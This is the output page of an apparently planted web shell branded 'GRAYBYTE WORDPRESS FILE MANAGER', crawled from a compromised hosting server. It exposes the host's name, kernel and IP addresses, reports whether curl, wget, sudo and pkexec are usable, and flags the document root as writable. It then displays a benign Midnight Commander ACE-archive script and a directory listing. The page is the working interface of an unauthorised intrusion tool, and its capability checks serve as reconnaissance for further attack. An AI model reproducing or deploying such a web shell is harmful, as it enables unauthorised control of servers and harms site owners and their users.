✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.105
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/libexec/mc/extfs.d//uace
#! /bin/sh

#
# ACE Virtual filesystem executive v0.1
# Works with unace v2.5

# Note: There are two packages for Debian: 'unace' (v1.2b) and
# 'unace-nonfree' (v2.x). This script supports 'unace-nonfree' only.
# 'unace', which supports only old versions of ACE archives (and is
# therefore of little use), uses the pipe character to separate columns
# in its listing format.

# Copyright (C) 2008 Jacques Pelletier
# May be distributed under the terms of the GNU Public License
# <jpelletier@ieee.org>
#

# Define which archiver you are using with appropriate options
ACE_LIST=${MC_TEST_EXTFS_LIST_CMD:-"unace l"}
ACE_GET="unace x"
# ACE_PUT="unace ?"  not available

# The 'list' command executive

# Unace:	DD.MM.YY HH:MM packed size ratio file
# ls:
mc_ace_fs_list()
{
    if [ "x$UID" = "x" ]; then
        UID=`id -ru 2>/dev/null`
        if [ "x$UID" = "x" ]; then
            UID=0
        fi
    fi
    $ACE_LIST "$1" | gawk -v uid=$UID '
/%/ { 
  split($1,date,".")

  if (date[3] > 50)
    date[3]=date[3] + 1900
  else
    date[3]=date[3] + 2000

  printf "-rw-r--r--   1 %-8d %-8d %8d %02d-%02d-%04d %s %s\n", uid, 0, $4, date[2], date[1], date[3], $2, $6
}' 2>/dev/null
    exit 0
}

# Command: copyout archivename storedfilename extractto
mc_ace_fs_copyout()
{
   $ACE_GET "$1" "$2" > /dev/null 2>&1
        mv "$2" "$3"
}

# The main routine
umask 077

cmd="$1"
shift

case "$cmd" in
   list) 	mc_ace_fs_list 	  "$@" ;;
   copyout) mc_ace_fs_copyout "$@" ;;
   *)       exit 1 ;;
esac
exit 0


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
5 Mar 2024 11.20 PM
root / root
0755
README
7.287 KB
4 Mar 2017 5.26 PM
root / root
0644
README.extfs
1.107 KB
24 Feb 2017 8.25 PM
root / root
0644
a+
3.131 KB
18 Oct 2019 8.37 PM
root / root
0755
apt+
9.498 KB
18 Oct 2019 8.37 PM
root / root
0755
audio
1.289 KB
18 Oct 2019 8.37 PM
root / root
0755
bpp
1.179 KB
24 Feb 2017 8.25 PM
root / root
0755
changesetfs
2.502 KB
24 Feb 2017 8.25 PM
root / root
0755
deb
5.336 KB
18 Oct 2019 8.37 PM
root / root
0755
deba
3.002 KB
18 Oct 2019 8.37 PM
root / root
0755
debd
10.257 KB
18 Oct 2019 8.37 PM
root / root
0755
dpkg+
8.787 KB
18 Oct 2019 8.37 PM
root / root
0755
gitfs+
0.764 KB
24 Feb 2017 8.25 PM
root / root
0755
hp48+
3.575 KB
18 Oct 2019 8.37 PM
root / root
0755
iso9660
5.646 KB
18 Oct 2019 8.37 PM
root / root
0755
lslR
1.377 KB
18 Oct 2019 8.37 PM
root / root
0755
mailfs
5.586 KB
18 Oct 2019 8.37 PM
root / root
0755
patchfs
10.885 KB
18 Oct 2019 8.37 PM
root / root
0755
patchsetfs
2.256 KB
24 Feb 2017 8.25 PM
root / root
0755
rpm
13.251 KB
4 Mar 2017 5.26 PM
root / root
0755
rpms+
1.474 KB
18 Oct 2019 8.37 PM
root / root
0755
trpm
7.652 KB
24 Feb 2017 8.25 PM
root / root
0755
u7z
4.71 KB
4 Mar 2017 5.26 PM
root / root
0755
uace
1.473 KB
18 Oct 2019 8.37 PM
root / root
0755
ualz
1.25 KB
18 Oct 2019 8.37 PM
root / root
0755
uar
1.292 KB
18 Oct 2019 8.37 PM
root / root
0755
uarc
1.785 KB
18 Oct 2019 8.37 PM
root / root
0755
uarj
1.616 KB
18 Oct 2019 8.37 PM
root / root
0755
ucab
0.717 KB
18 Oct 2019 8.37 PM
root / root
0755
uha
0.946 KB
18 Oct 2019 8.37 PM
root / root
0755
ulha
3.779 KB
18 Oct 2019 8.37 PM
root / root
0755
ulib
2.759 KB
18 Oct 2019 8.37 PM
root / root
0755
urar
4.369 KB
18 Oct 2019 8.37 PM
root / root
0755
uzip
14.903 KB
18 Oct 2019 8.37 PM
root / root
0755
uzoo
1.563 KB
18 Oct 2019 8.37 PM
root / root
0755

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF